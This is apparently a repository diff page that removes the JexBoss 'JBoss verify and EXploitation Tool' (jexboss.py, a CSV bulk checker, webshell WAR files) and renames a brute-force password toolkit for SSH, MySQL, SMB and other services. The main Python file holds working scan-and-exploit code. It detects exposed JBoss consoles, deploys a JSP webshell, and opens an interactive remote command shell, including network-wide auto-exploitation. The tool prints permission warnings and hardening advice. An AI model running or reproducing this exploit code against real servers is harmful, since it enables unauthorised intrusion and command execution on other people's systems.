tup = lambda x: [int(y) for y in (x + '.0.0.0').split('.')][:3]
if tup(last_version) > tup(current_version):
print (
GREEN + BOLD + " * NEW VERSION AVAILABLE: JexBoss v%s (%s)\n" % (last_version, date_last_version) + ENDC +
GREEN + " * Link: %s\n" % link +
GREEN + " * Release notes:")
for note in notes:
print (" %s" % note)
return True
else:
return False

BIN
Jboss_Verify_EXploitation/demo.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 116 KiB

544
Jboss_Verify_EXploitation/jexboss.py
View File

@ -1,544 +0,0 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
JexBoss: Jboss verify and EXploitation Tool
https://github.com/joaomatosf/jexboss
Copyright 2013 João Filho Matos Figueiredo
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import textwrap
import traceback
RED = '\x1b[91m'
RED1 = '\033[31m'
BLUE = '\033[94m'
GREEN = '\033[32m'
BOLD = '\033[1m'
NORMAL = '\033[0m'
ENDC = '\033[0m'
__author__ = "João Filho Matos Figueiredo <joaomatosf@gmail.com>"
__version = "1.0.12"
from sys import argv, exit, version_info
if version_info[0] == 2 and version_info[1] < 7:
print(RED1 + BOLD + "\n * You are using the Python version 2.6. The JexBoss requires version >= 2.7.\n"
"" + GREEN + " Please install the Python version >= 2.7. \n\n"
" Example for CentOS using Software Collections scl:\n"
" # yum -y install centos-release-scl\n"
" # yum -y install python27\n"
" # scl enable python27 bash\n" + ENDC)
exit(0)
import signal
from _exploits import *
from _updates import *
from os import name, system
import os
import shutil
from zipfile import ZipFile
from time import sleep
from random import randint
import argparse, socket
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
from urllib3.util import parse_url
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
except ImportError:
print(RED1 + BOLD + "\n * Package urllib3 not installed. Please install the dependencies before continue.\n"
"" + GREEN + " Example: \n"
" # pip install -r requires.txt\n" + ENDC)
exit(0)
try:
import ipaddress
except:
print(RED1 + BOLD + "\n * Package ipaddress not installed. Please install the dependencies before continue.\n"
"" + GREEN + " Example: \n"
" # pip install -r requires.txt\n" + ENDC)
exit(0)
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
disable_warnings()
timeout = Timeout(connect=3.0, read=6.0)
pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
global gl_interrupted
gl_interrupted = False
user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"]
global gl_args
def handler_interrupt(signum, frame):
global gl_interrupted
gl_interrupted = True
print ("Interrupting execution ...")
signal.signal(signal.SIGINT, handler_interrupt)
def get_successfully(url, path):
"""
Test if a GET to a URL is successful
:param url: The base URL
:param path: The URL path
:return: The HTTP status code
"""
sleep(5)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.request('GET', url + path, redirect=False, headers=headers)
result = r.status
if result == 404:
sleep(7)
r = pool.request('GET', url + path, redirect=False, headers=headers)
result = r.status
return result
def check_connectivity(host, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.connect((str(host), int(port)))
s.close()
except socket.timeout:
return False
except:
return False
return True
def check_vul(url):
"""
Test if a GET to a URL is successful
:param url: The URL to test
:return: A dict with the exploit type as the keys, and the HTTP status code as the value
"""
if gl_args.mode == 'auto-scan' or gl_args.mode == 'file-scan':
timeout = Timeout(connect=1.0, read=3.0)
pool = PoolManager(timeout=timeout, retries=1, cert_reqs='CERT_NONE')
else:
timeout = Timeout(connect=3.0, read=6.0)
pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
url_check = parse_url(url)
if '443' in str(url_check.port) and url_check.scheme != 'https':
url = "https://"+str(url_check.host)+":"+str(url_check.port)
print(GREEN + "\n ** Checking Host: %s **\n" % url)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console" : "/web-console/ServerInfo.jsp",
"JMXInvokerServlet": "/invoker/JMXInvokerServlet",
"admin-console" : "/admin-console/"}
for i in paths.keys():
if gl_interrupted: break
try:
print(GREEN + " * Checking %s: \t" % i + ENDC),
r = pool.request('HEAD', url +str(paths[i]), redirect=False, headers=headers)
paths[i] = r.status
# check if it's false positive
if len(r.getheaders()) == 0:
print(RED + "[ ERROR ]\n * The server %s is not an HTTP server.\n" % url + ENDC)
paths = {"jmx-console": 505,
"web-console": 505,
"JMXInvokerServlet": 505,
"admin-console": 505}
break
if paths[i] in (301, 302, 303, 307, 308):
url_redirect = r.get_redirect_location()
print(GREEN + "[ REDIRECT ]\n * The server sent a redirect to: %s\n" % url_redirect)
elif paths[i] == 200 or paths[i] == 500:
if i == "admin-console":
print(RED + "[ EXPOSED ]" + ENDC)
else:
print(RED + "[ VULNERABLE ]" + ENDC)
else:
print(GREEN + "[ OK ]")
except:
print(RED + "\n * An error occurred while connecting to the host %s\n" % url + ENDC)
paths[i] = 505
return paths
def auto_exploit(url, exploit_type):
"""
Automatically exploit a URL
:param url: The URL to exploit
:param exploit_type: One of the following
exploitJmxConsoleFileRepository: tested and working in JBoss 4 and 5
exploitJmxConsoleMainDeploy: tested and working in JBoss 4 and 6
exploitWebConsoleInvoker: tested and working in JBoss 4
exploitJMXInvokerFileRepository: tested and working in JBoss 4 and 5
exploitAdminConsole: tested and working in JBoss 5 and 6 (with default password)
"""
print(GREEN + "\n * Sending exploit code to %s. Please wait...\n" % url)
result = 505
if exploit_type == "jmx-console":
result = exploit_jmx_console_file_repository(url)
if result != 200 and result != 500:
result = exploit_jmx_console_main_deploy(url)
elif exploit_type == "web-console":
result = exploit_web_console_invoker(url)
elif exploit_type == "JMXInvokerServlet":
result = exploit_jmx_invoker_file_repository(url, 0)
if result != 200 and result != 500:
result = exploit_jmx_invoker_file_repository(url, 1)
elif exploit_type == "admin-console":
result = exploit_admin_console(url)
if result == 200 or result == 500:
if not gl_args.auto_exploit:
print(GREEN + " * Successfully deployed code! Starting command shell. Please wait...\n" + ENDC)
shell_http(url, exploit_type)
else:
print(GREEN + " * Successfully deployed code via vector %s\n *** Run JexBoss in Standalone mode to open command shell. ***" %(exploit_type) + ENDC)
return True
else:
print(RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" +
" Waiting for 7 seconds...\n " + ENDC)
if gl_args.mode == 'standalone':
sleep(7)
return False
else:
return False
def shell_http(url, shell_type):
"""
Connect to an HTTP shell
:param url: The URL to connect to
:param shell_type: The type of shell to connect to
"""
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
if gl_args.disable_check_updates:
headers['check-updates'] = 'false'
if shell_type == "jmx-console" or shell_type == "web-console" or shell_type == "admin-console":
path = '/jexws3/jexws3.jsp?'
elif shell_type == "JMXInvokerServlet":
path = '/jexinv3/jexinv3.jsp?'
pool.request('GET', url+ path, redirect=False, headers=headers)
sleep(7)
resp = ""
print(" * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n")
print(RED + " * " + url + ": \n" + ENDC)
for cmd in ['uname -a', 'cat /etc/issue', 'id']:
cmd = urlencode({"ppp": cmd})
r = pool.request('GET', url + path + cmd, redirect=False, headers=headers)
resp += " " + str(r.data).split(">")[1]
print(resp.replace('\\n', '\n')),
while 1:
print(BLUE + "[Type commands or \"exit\" to finish]")
cmd = input("Shell> " + ENDC) if version_info[0] >= 3 else raw_input("Shell> " + ENDC)
if cmd == "exit":
break
cmd = urlencode({"ppp": cmd})
r = pool.request('GET', url + path + cmd, redirect=False, headers=headers)
resp = str(r.data)
if r.status == 404:
print(RED + " * Error contacting the command shell. Try again later...")
continue
stdout = ""
try:
stdout = resp.split("pre>")[1]
except:
print(RED + " * Error contacting the command shell. Try again later...")
if stdout.count("An exception occurred processing JSP page") == 1:
print(RED + " * Error executing command \"%s\". " % cmd.split("=")[1] + ENDC)
else:
print(stdout.replace('\\n', '\n'))
def clear():
"""
Clears the console
"""
if name == 'posix':
system('clear')
elif name == ('ce', 'nt', 'dos'):
system('cls')
def banner():
"""
Print the banner
"""
clear()
print(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n"
" | |\n"
" | @author: João Filho Matos Figueiredo |\n"
" | @contact: joaomatosf@gmail.com |\n"
" | |\n"
" | @update: https://github.com/joaomatosf/jexboss |\n"
" #______________________________________________________#\n")
print(RED1 + " @version: %s\n"%__version )
print (ENDC)
def help_usage():
usage = (BOLD + BLUE + "\n Examples:\n" + ENDC +
BLUE + "\n For simple usage, you must provide the host name or IP address you want to test:" +
GREEN + "\n\n $ python jexboss.py -host https://site.com.br" +
BLUE + "\n\n For auto scan mode, you must provide the network in CIDR format, list of ports and filename for store results:" +
GREEN + "\n\n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log" +
BLUE + "\n\n For file scan mode, you must provide the filename with host list to be scanned (one host per line)and filename for store results:" +
GREEN + "\n\n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log" + ENDC)
return usage
def network_args(string):
try:
if version_info[0] >= 3:
value = ipaddress.ip_network(string)
else:
value = ipaddress.ip_network(unicode(string))
except:
msg = "%s is not a network address in CIDR format." % string
raise argparse.ArgumentTypeError(msg)
return value
def main():
"""
Run interactively. Call when the module is run by itself.
:return: Exit code
"""
# check for Updates
updates = check_updates()
if updates:
print(BLUE + BOLD + "\n\n * An update is available and is recommended update before continuing.\n" +
" Do you want to update now?")
pick = input(" YES/no ? ").lower() if version_info[0] >= 3 else raw_input(" YES/no ? ").lower()
print (ENDC)
if pick != "no":
updated = auto_update()
if updated:
print(GREEN + BOLD + "\n * The JexBoss has been successfully updated. Please run again to enjoy the updates.\n" +ENDC)
exit(0)
else:
print(RED + BOLD + "\n\n * An error occurred while updating the JexBoss. Please try again..\n" +ENDC)
exit(1)
vulnerables = False
# check vulnerabilities for standalone mode
if gl_args.mode == 'standalone':
url = gl_args.host
scan_results = check_vul(url)
# performs exploitation
for i in ["jmx-console", "web-console", "JMXInvokerServlet", "admin-console"]:
if scan_results[i] == 200 or scan_results[i] == 500:
vulnerables = True
if gl_args.auto_exploit:
auto_exploit(url, i)
else:
print(BLUE + "\n\n * Do you want to try to run an automated exploitation via \"" +
BOLD + i + NORMAL + "\" ?\n" +
" This operation will provide a simple command shell to execute commands on the server..\n" +
RED + " Continue only if you have permission!" + ENDC)
pick = input(" yes/NO ? ").lower() if version_info[0] >= 3 else raw_input(" yes/NO ? ").lower()
if pick == "yes":
auto_exploit(url, i)
# check vulnerabilities for auto scan mode
elif gl_args.mode == 'auto-scan':
file_results = open(gl_args.results, 'w')
file_results.write("JexBoss Scan Mode Report\n\n")
for ip in gl_args.network.hosts():
if gl_interrupted: break
for port in gl_args.ports.split(","):
if check_connectivity(ip, port):
url = "{0}:{1}".format(ip,port)
ip_results = check_vul(url)
for key in ip_results.keys():
if ip_results[key] == 200 or ip_results[key] == 500:
vulnerables = True
if gl_args.auto_exploit:
result_exploit = auto_exploit(url, key)
if result_exploit:
file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key))
else:
file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key))
else:
file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key))
file_results.flush()
else:
print (RED+"\n * Host %s:%s does not respond."% (ip,port)+ENDC)
file_results.close()
elif gl_args.mode == 'file-scan':
file_results = open(gl_args.out, 'w')
file_results.write("JexBoss Scan Mode Report\n\n")
file_input = open(gl_args.file, 'r')
for url in file_input.readlines():
if gl_interrupted: break
url = url.strip()
ip = str(parse_url(url)[2])
port = parse_url(url)[3] if parse_url(url)[3] != None else 80
if check_connectivity(ip, port):
url_results = check_vul(url)
for key in url_results.keys():
if url_results[key] == 200 or url_results[key] == 500:
vulnerables = True
if gl_args.auto_exploit:
result_exploit = auto_exploit(url, key)
if result_exploit:
file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key))
else:
file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key))
else:
file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key))
file_results.flush()
else:
print (RED + "\n * Host %s:%s does not respond." % (ip, port) + ENDC)
file_results.close()
# resume results
if vulnerables:
banner()
print(RED + BOLD+" Results: potentially compromised server!" + ENDC)
if gl_args.mode == 'file-scan':
print(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.out) + ENDC)
elif gl_args.mode == 'auto-scan':
print(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.results) + ENDC)
print(GREEN + " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n"
+BOLD+ " Recommendations: \n" +ENDC+
GREEN+ " - Remove web consoles and services that are not used, eg:\n"
" $ rm web-console.war\n"
" $ rm http-invoker.sar\n"
" $ rm jmx-console.war\n"
" $ rm jmx-invoker-adaptor-server.sar\n"
" $ rm admin-console.war\n"
" - Use a reverse proxy (eg. nginx, apache, F5)\n"
" - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
" - Search vestiges of exploitation within the directories \"deploy\" and \"management\".\n\n"
" References:\n"
" [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
" [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
"\n"
" - If possible, discard this server!\n"
" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n")
else:
print(GREEN + "\n\n * Results: \n" +
" The server is not vulnerable to bugs tested ... :D\n\n" + ENDC)
# infos
print(ENDC + " * Info: review, suggestions, updates, etc: \n" +
" https://github.com/joaomatosf/jexboss\n")
print(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n"
" including research to new versions of JBoss and zero days. \n\n" +
GREEN + BOLD + " * Paypal: " + ENDC + " joaomatosf@gmail.com \n" +
GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n" +
GREEN + BOLD + " * URI: " + ENDC + " bitcoin:14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C?label=jexboss\n")
print(ENDC)
banner()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
#description="JexBoss v%s: JBoss verify and EXploitation Tool" %__version,
description=textwrap.dedent(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n"
" | |\n"
" | @author: João Filho Matos Figueiredo |\n"
" | @contact: joaomatosf@gmail.com |\n"
" | |\n"
" | @update: https://github.com/joaomatosf/jexboss |\n"
" #______________________________________________________#\n"
" @version: "+__version+"\n"+ help_usage()),
epilog="",
prog="JexBoss"
)
group_standalone = parser.add_argument_group('Standalone mode')
group_auto_scan = parser.add_argument_group('Auto scan mode')
group_file_scan = parser.add_argument_group('File scan mode')
parser.add_argument('--version', action='version', version='%(prog)s ' + __version)
parser.add_argument("--auto-exploit", "-A",
help="Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)",
action='store_true')
parser.add_argument("--disable-check-updates", "-D", help="Disable the check for updates performed by JSP Webshell at: http://webshell.jexboss.net/jsp_version.txt",
action='store_true')
parser.add_argument('-mode', help="Operation mode", choices=['standalone', 'auto-scan', 'file-scan'], default='standalone')
group_standalone.add_argument("-host", help="Host address to be checked (eg. http://192.168.0.10:8080)",
type=str)
group_auto_scan.add_argument("-network", help="Network to be checked in CIDR format (eg. 10.0.0.0/8)",
type=network_args, default='192.168.0.0/24')
group_auto_scan.add_argument("-ports",
help="List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443)", type=str, default='8080,80')
group_auto_scan.add_argument("-results",
help="File name to store the auto scan results", type=str, metavar='FILENAME', default='jexboss_auto_scan_results.log')
group_file_scan.add_argument("-file", help="Filename with host list to be scanned (one host per line)", type=str, metavar='FILENAME_HOSTS')
group_file_scan.add_argument("-out", help="File name to store the file scan results", type=str, metavar='FILENAME_RESULTS', default='jexboss_file_scan_results.log')
gl_args = parser.parse_args()
#if 'h' not in gl_args and gl_args.host == None:
# parser.print_help()
if gl_args.mode == 'standalone' and gl_args.host == None or \
gl_args.mode == 'file-scan' and gl_args.file == None:
banner()
exit(0)
else:
main()

62
Jboss_Verify_EXploitation/jexcsv.py
View File

@ -1,62 +0,0 @@
"""
Check URLs for JBoss vulnerabilities in bulk and output results to a CSV file
Copyright 2016 Sean Whalen
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from argparse import ArgumentParser
from csv import DictWriter
from jexboss import check_vul
__version__ = "1.0.0"
__author__ = "Sean Whalen - @SeanTheGeek"
args = ArgumentParser(description=__doc__)
args.add_argument("input", help="Path to the input file")
args.add_argument("output", help="Path to the output file")
args = args.parse_args()
paths = {"jmx-console": "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo",
"web-console" : "/web-console/ServerInfo.jsp",
"JMXInvokerServlet": "/invoker/JMXInvokerServlet"}
results = []
with open(args.input, "r") as input_file:
urls = input_file.readlines()
for url in urls:
if url == "":
continue
if not url.startswith("http"):
url = "http://{0}".format(url)
url = url.strip()
if url.endswith("/"):
url = url[:-1]
url_results = check_vul(url)
for key in url_results.keys():
if url_results[key] == 200 or url_results[key] == 500:
full_url = "{0}{1}".format(url, paths[key])
result = dict(base_url=url, vulnerability=key, full_url=full_url, status_code=url_results[key])
results.append(result)
fields = ["base_url", "vulnerability", "full_url", "status_code"]
with open(args.output, "w") as output_file:
writer = DictWriter(output_file, fields)
writer.writeheader()
writer.writerows(results)

2
Jboss_Verify_EXploitation/requires.txt
View File

@ -1,2 +0,0 @@
urllib3
ipaddress

BIN
Jboss_Verify_EXploitation/screenshots/help_usage.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 280 KiB

BIN
Jboss_Verify_EXploitation/screenshots/network_scan_mode.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 202 KiB

BIN
Jboss_Verify_EXploitation/screenshots/results_and_recommendations.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 277 KiB

BIN
Jboss_Verify_EXploitation/screenshots/scan_with_auto_exploit_mode.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 163 KiB

BIN
Jboss_Verify_EXploitation/screenshots/standalone_mode.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 233 KiB

BIN
Jboss_Verify_EXploitation/util/jbossass.war
View File

Binary file not shown.

BIN
Jboss_Verify_EXploitation/util/jexws.war
View File

Binary file not shown.

0
Linux_scripts/siege_batchaccess.txt → Linux_scripts/siege_batchaccess.sh
View File

0
SwitchyOmega/OmegaOptions.bak → User Agents/SwitchyOmega/OmegaOptions.bak
View File

0
SwitchyOmega/SwitchyOmega_v2.2.11.crx → User Agents/SwitchyOmega/SwitchyOmega_v2.2.11.crx
View File

0
Bruteforce/README.md → Weak_Password/Bruteforce/README.md
View File

0
Bruteforce/bruteforce.py → Weak_Password/Bruteforce/bruteforce.py
View File

0
Fuxi-Scanner/fuxi/views/modules/subdomain/__init__.py → Weak_Password/Bruteforce/comm/__init__.py
View File

0
Bruteforce/comm/__init__.pyc → Weak_Password/Bruteforce/comm/__init__.pyc
View File

0
Bruteforce/comm/config.py → Weak_Password/Bruteforce/comm/config.py
View File

0
Bruteforce/comm/config.pyc → Weak_Password/Bruteforce/comm/config.pyc
View File

0
Bruteforce/comm/portscan.py → Weak_Password/Bruteforce/comm/portscan.py
View File

0
Bruteforce/comm/portscan.pyc → Weak_Password/Bruteforce/comm/portscan.pyc
View File

0
Bruteforce/comm/printers.py → Weak_Password/Bruteforce/comm/printers.py
View File

0
Bruteforce/comm/printers.pyc → Weak_Password/Bruteforce/comm/printers.pyc
View File

0
Bruteforce/conf/.DS_Store → Weak_Password/Bruteforce/conf/.DS_Store vendored
View File

0
Bruteforce/conf/.svn/all-wcprops → Weak_Password/Bruteforce/conf/.svn/all-wcprops
View File

0
Bruteforce/conf/.svn/entries → Weak_Password/Bruteforce/conf/.svn/entries
View File

0
Bruteforce/conf/.svn/text-base/config.txt.svn-base → Weak_Password/Bruteforce/conf/.svn/text-base/config.txt.svn-base
View File

0
Bruteforce/conf/ftp.conf → Weak_Password/Bruteforce/conf/ftp.conf
View File

0
Bruteforce/conf/ldapd.conf → Weak_Password/Bruteforce/conf/ldapd.conf
View File

0
Bruteforce/conf/mongodb.conf → Weak_Password/Bruteforce/conf/mongodb.conf
View File

0
Bruteforce/conf/mssql.conf → Weak_Password/Bruteforce/conf/mssql.conf
View File

0
Bruteforce/conf/mysql.conf → Weak_Password/Bruteforce/conf/mysql.conf
View File

0
Bruteforce/conf/pop3.conf → Weak_Password/Bruteforce/conf/pop3.conf
View File

0
Bruteforce/conf/postgres.conf → Weak_Password/Bruteforce/conf/postgres.conf
View File

0
Bruteforce/conf/signs.conf → Weak_Password/Bruteforce/conf/signs.conf
View File

0
Bruteforce/conf/smb.conf → Weak_Password/Bruteforce/conf/smb.conf
View File

0
Bruteforce/conf/snmp.conf → Weak_Password/Bruteforce/conf/snmp.conf
View File

0
Bruteforce/conf/ssh.conf → Weak_Password/Bruteforce/conf/ssh.conf
View File

0
Bruteforce/conf/tomcat.conf → Weak_Password/Bruteforce/conf/tomcat.conf
View File

0
Bruteforce/conf/vnc.conf → Weak_Password/Bruteforce/conf/vnc.conf
View File

0
Bruteforce/conf/web.conf → Weak_Password/Bruteforce/conf/web.conf
View File

0
Bruteforce/factorys/__init__.py → Weak_Password/Bruteforce/factorys/__init__.py
View File

0
Bruteforce/factorys/__init__.pyc → Weak_Password/Bruteforce/factorys/__init__.pyc
View File

0
Bruteforce/factorys/pluginFactory.py → Weak_Password/Bruteforce/factorys/pluginFactory.py
View File

0
Bruteforce/factorys/pluginFactory.pyc → Weak_Password/Bruteforce/factorys/pluginFactory.pyc
View File

0
Bruteforce/plugins/.DS_Store → Weak_Password/Bruteforce/plugins/.DS_Store vendored
View File

0
Bruteforce/plugins/__init__.py → Weak_Password/Bruteforce/plugins/__init__.py
View File

0
Bruteforce/plugins/__init__.pyc → Weak_Password/Bruteforce/plugins/__init__.pyc
View File

0
Bruteforce/plugins/ftp.py → Weak_Password/Bruteforce/plugins/ftp.py
View File

0
Bruteforce/plugins/ftp.pyc → Weak_Password/Bruteforce/plugins/ftp.pyc
View File

0
Bruteforce/plugins/ldapd.py → Weak_Password/Bruteforce/plugins/ldapd.py
View File

0
Bruteforce/plugins/ldapd.pyc → Weak_Password/Bruteforce/plugins/ldapd.pyc
View File

0
Bruteforce/plugins/mongodb.py → Weak_Password/Bruteforce/plugins/mongodb.py
View File

0
Bruteforce/plugins/mongodb.pyc → Weak_Password/Bruteforce/plugins/mongodb.pyc
View File

0
Bruteforce/plugins/mssql.py → Weak_Password/Bruteforce/plugins/mssql.py
View File

0
Bruteforce/plugins/mssql.pyc → Weak_Password/Bruteforce/plugins/mssql.pyc
View File

0
Bruteforce/plugins/mysql.py → Weak_Password/Bruteforce/plugins/mysql.py
View File

0
Bruteforce/plugins/mysql.pyc → Weak_Password/Bruteforce/plugins/mysql.pyc
View File

0
Bruteforce/plugins/ndr.pyc → Weak_Password/Bruteforce/plugins/ndr.pyc
View File

0
Bruteforce/plugins/pop3.py → Weak_Password/Bruteforce/plugins/pop3.py
View File

0
Bruteforce/plugins/pop3.pyc → Weak_Password/Bruteforce/plugins/pop3.pyc
View File

0
Bruteforce/plugins/postgres.py → Weak_Password/Bruteforce/plugins/postgres.py
View File

0
Bruteforce/plugins/postgres.pyc → Weak_Password/Bruteforce/plugins/postgres.pyc
View File

0
Bruteforce/plugins/printers.pyc → Weak_Password/Bruteforce/plugins/printers.pyc
View File

0
Bruteforce/plugins/redisexp.py → Weak_Password/Bruteforce/plugins/redisexp.py
View File

0
Bruteforce/plugins/redisexp.pyc → Weak_Password/Bruteforce/plugins/redisexp.pyc
View File

0
Bruteforce/plugins/rsync.py → Weak_Password/Bruteforce/plugins/rsync.py
View File

0
Bruteforce/plugins/rsync.pyc → Weak_Password/Bruteforce/plugins/rsync.pyc
View File

0
Bruteforce/plugins/rsynclib.py → Weak_Password/Bruteforce/plugins/rsynclib.py
View File

0
Bruteforce/plugins/rsynclib.pyc → Weak_Password/Bruteforce/plugins/rsynclib.pyc
View File

0
Bruteforce/plugins/rsyncs.pyc → Weak_Password/Bruteforce/plugins/rsyncs.pyc
View File

0
Bruteforce/plugins/smb.py → Weak_Password/Bruteforce/plugins/smb.py
View File

0
Bruteforce/plugins/smb.pyc → Weak_Password/Bruteforce/plugins/smb.pyc
View File

0
Bruteforce/plugins/snmp.py → Weak_Password/Bruteforce/plugins/snmp.py
View File

0
Bruteforce/plugins/snmp.pyc → Weak_Password/Bruteforce/plugins/snmp.pyc
View File

0
Bruteforce/plugins/ssh.py → Weak_Password/Bruteforce/plugins/ssh.py
View File

0
Bruteforce/plugins/ssh.pyc → Weak_Password/Bruteforce/plugins/ssh.pyc
View File

0
Bruteforce/plugins/ssltest.py → Weak_Password/Bruteforce/plugins/ssltest.py
View File

0
Bruteforce/plugins/ssltest.pyc → Weak_Password/Bruteforce/plugins/ssltest.pyc
View File

0
Bruteforce/plugins/tomcat.pyc → Weak_Password/Bruteforce/plugins/tomcat.pyc
View File

0
Bruteforce/plugins/vnc.py → Weak_Password/Bruteforce/plugins/vnc.py
View File

0
Bruteforce/plugins/vnc.pyc → Weak_Password/Bruteforce/plugins/vnc.pyc
View File

0
Bruteforce/plugins/vnclib.py → Weak_Password/Bruteforce/plugins/vnclib.py
View File

0
Bruteforce/plugins/vnclib.pyc → Weak_Password/Bruteforce/plugins/vnclib.pyc
View File

Some files were not shown because too many files have changed in this diff Show More